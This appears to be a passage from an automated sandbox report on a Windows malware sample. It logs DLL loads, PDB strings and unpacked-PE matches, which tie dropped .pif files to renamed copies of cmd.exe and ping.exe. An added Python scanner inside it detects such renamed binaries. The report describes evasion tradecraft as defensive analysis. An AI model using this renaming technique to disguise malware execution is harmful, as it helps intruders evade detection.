                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exe Section loaded: winmm.dll
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exe Section loaded: wininet.dll
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
                  Source: C:\Windows\SysWOW64\colorcpl.exe Window found: window name: SysTabControl32
                  Source: Window Recorder Window detected: More than 3 window changes detected
                  Source: C:\Windows\SysWOW64\colorcpl.exe Window detected: Number of UI elements: 12
                  Source: AWkpqJMxci.exe Static file information: File size 1339392 > 1048576
                  Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: AWkpqJMxci.exe, 00000000.00000002.1803873997.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1747775109.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1748003112.000000007FCA0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: easinvoker.pdb source: AWkpqJMxci.exe, AWkpqJMxci.exe, 00000000.00000003.1666597559.000000007FB70000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000002.1803873997.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000002.1789189761.000000000D605000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1747775109.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000002.1782458415.000000000238F000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000002.1789189761.000000000D5CA000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1748003112.000000007FCA0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: cmd.pdbUGP source: esentutl.exe, 00000003.00000003.1762893892.0000000000AA0000.00000004.00001000.00020000.00000000.sdmp, alpha.pif, 00000005.00000000.1769159470.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, alpha.pif, 00000009.00000000.1774119719.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, alpha.pif, 0000000A.00000000.1777848027.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, alpha.pif, 0000000D.00000000.1873419118.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, alpha.pif, 0000000E.00000002.1875239143.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, alpha.pif, 0000000F.00000002.1876616016.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, alpha.pif.3.dr
                  Source: Binary string: ping.pdbGCTL source: esentutl.exe, 00000004.00000003.1766895449.0000000000AE0000.00000004.00001000.00020000.00000000.sdmp, xpha.pif, 0000000B.00000002.1870542553.0000000000D11000.00000020.00000001.01000000.00000009.sdmp, xpha.pif.4.dr
                  Source: Binary string: easinvoker.pdbH source: AWkpqJMxci.exe, 00000000.00000002.1803873997.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1747775109.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1748003112.000000007FCA0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: easinvoker.pdbGCTL source: AWkpqJMxci.exe, 00000000.00000003.1666597559.000000007FB70000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000002.1789189761.000000000D605000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000002.1782458415.000000000238F000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000002.1789189761.000000000D5CA000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1768938154.000000000E668000.00000004.00000020.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1768938154.000000000E63F000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: cmd.pdb source: alpha.pif, alpha.pif, 0000000A.00000000.1777848027.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, alpha.pif, 0000000D.00000000.1873419118.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, alpha.pif, 0000000E.00000002.1875239143.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, alpha.pif, 0000000F.00000002.1876616016.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, alpha.pif.3.dr
                  Source: Binary string: ping.pdb source: esentutl.exe, 00000004.00000003.1766895449.0000000000AE0000.00000004.00001000.00020000.00000000.sdmp, xpha.pif, xpha.pif, 0000000B.00000002.1870542553.0000000000D11000.00000020.00000001.01000000.00000009.sdmp, xpha.pif.4.dr
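
The cmd.pdb and ping.pdb strings above are what tie alpha.pif and xpha.pif back to cmd.exe and ping.exe: a renamed copy keeps the CodeView debug record the linker wrote into the original file. The following is an added example, not part of the Joe Sandbox report, showing how to pull those RSDS records out of a file image or memory dump and flag files whose PDB name disagrees with their on-disk name. The dump it scans is constructed inline, and the function and class names are the example's own.

```python
import re
import struct
import uuid
from dataclasses import dataclass
from pathlib import PureWindowsPath

# CodeView 7.0 ("RSDS") debug record as embedded in a PE file or its memory image:
#   "RSDS" | 16-byte GUID (little-endian field layout) | 4-byte age | NUL-terminated PDB path
# The path is printable ASCII, so the match runs up to the first NUL byte.
_RSDS_RE = re.compile(rb"RSDS(.{16})(.{4})([\x20-\x7e]+)\x00", re.DOTALL)


@dataclass(frozen=True)
class PdbRecord:
    offset: int   # byte offset of the record inside the scanned buffer
    guid: str     # PDB signature GUID, the value symbol servers key on
    age: int      # PDB age, incremented on each relink
    path: str     # PDB path exactly as the linker wrote it, e.g. "cmd.pdb"


def find_pdb_records(buf: bytes) -> list[PdbRecord]:
    """Return every RSDS CodeView record found in a file image or memory dump."""
    records = []
    for m in _RSDS_RE.finditer(buf):
        guid = uuid.UUID(bytes_le=m.group(1))
        (age,) = struct.unpack("<I", m.group(2))
        records.append(PdbRecord(m.start(), str(guid), age, m.group(3).decode("ascii")))
    return records


def pdb_stem(path: str) -> str:
    """Base name of a PDB path without extension: 'E:\\x\\truesight.pdb' -> 'truesight'."""
    return PureWindowsPath(path).stem.lower()


def renamed_binary_hits(on_disk_name: str, buf: bytes) -> list[str]:
    """PDB stems embedded in `buf` that disagree with the file's on-disk name.

    A copy of cmd.exe saved as alpha.pif still carries its original 'cmd.pdb'
    record, so the mismatch ('alpha' vs 'cmd') is a cheap indicator of a renamed
    system binary. Treat hits as leads, not verdicts: DLLs and installers often
    embed PDB names that legitimately differ from the file name.
    """
    disk_stem = PureWindowsPath(on_disk_name).stem.lower()
    return sorted({pdb_stem(r.path) for r in find_pdb_records(buf)} - {disk_stem})


def make_rsds(path: str, guid: uuid.UUID, age: int) -> bytes:
    """Build one RSDS record; used only to construct the sample dump below."""
    return b"RSDS" + guid.bytes_le + struct.pack("<I", age) + path.encode("ascii") + b"\x00"


# Constructed sample (not a real dump): padding, a cmd.pdb record like the one the
# sandbox found in alpha.pif, more padding, and a ping.pdb record as in xpha.pif.
SAMPLE_DUMP = (
    b"\x00" * 32
    + make_rsds("cmd.pdb", uuid.UUID(int=0x1111), 1)
    + b"\xcc" * 16
    + make_rsds("ping.pdb", uuid.UUID(int=0x2222), 2)
)

if __name__ == "__main__":
    for rec in find_pdb_records(SAMPLE_DUMP):
        print(f"+0x{rec.offset:x}  {rec.path}  guid={rec.guid} age={rec.age}")
    print("alpha.pif mismatches:", renamed_binary_hits("alpha.pif", SAMPLE_DUMP))
```

Hits are leads rather than verdicts: plenty of legitimate DLLs and setup stubs carry a PDB name unrelated to the file name, so pair a mismatch with the file's location and parent process before acting on it. The GUID and age the scanner returns are the pair a symbol server keys on, which lets you confirm which exact build of cmd.exe or ping.exe was copied.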

                  Data Obfuscation

                  Source: Yara match File source: 0.2.AWkpqJMxci.exe.2880000.3.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 0.2.AWkpqJMxci.exe.238f278.2.unpack, type: UNPACKEDPE
                  Source: alpha.pif.3.dr Static PE information: 0xF8D87E17 [Thu Apr 20 00:53:43 2102 UTC]
                  (Note: Windows 10 and later system binaries carry a reproducible-build hash rather than a real time in TimeDateStamp, so an impossible compile date is expected for a genuine copy of cmd.exe and is not by itself evidence of tampering; the cmd.pdb string and the .pif extension are the stronger indicators here.)
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exe Code function: 0_2_0289894C LoadLibraryW,GetProcAddress,FreeLibrary, 0_2_0289894C
                  Source: alpha.pif.3.dr Static PE information: section name: .didat
                  (Note: .didat is the standard delay-load import section in Microsoft-built binaries, so this is consistent with alpha.pif being an unmodified copy of cmd.exe rather than a sign of packing.)
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exe Code function: 0_2_028AD2FC push 028AD367h; ret 0_2_028AD35F
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exe Code function: 0_2_028863AE push 0288640Bh; ret 0_2_02886403
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exe Code function: 0_2_028863B0 push 0288640Bh; ret 0_2_02886403
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exe Code function: 0_2_0288332C push eax; ret 0_2_02883368
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exe Code function: 0_2_0288C349 push 8B0288C1h; ret 0_2_0288C34E
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exe Code function: 0_2_028AC378 push 028AC56Eh; ret 0_2_028AC566
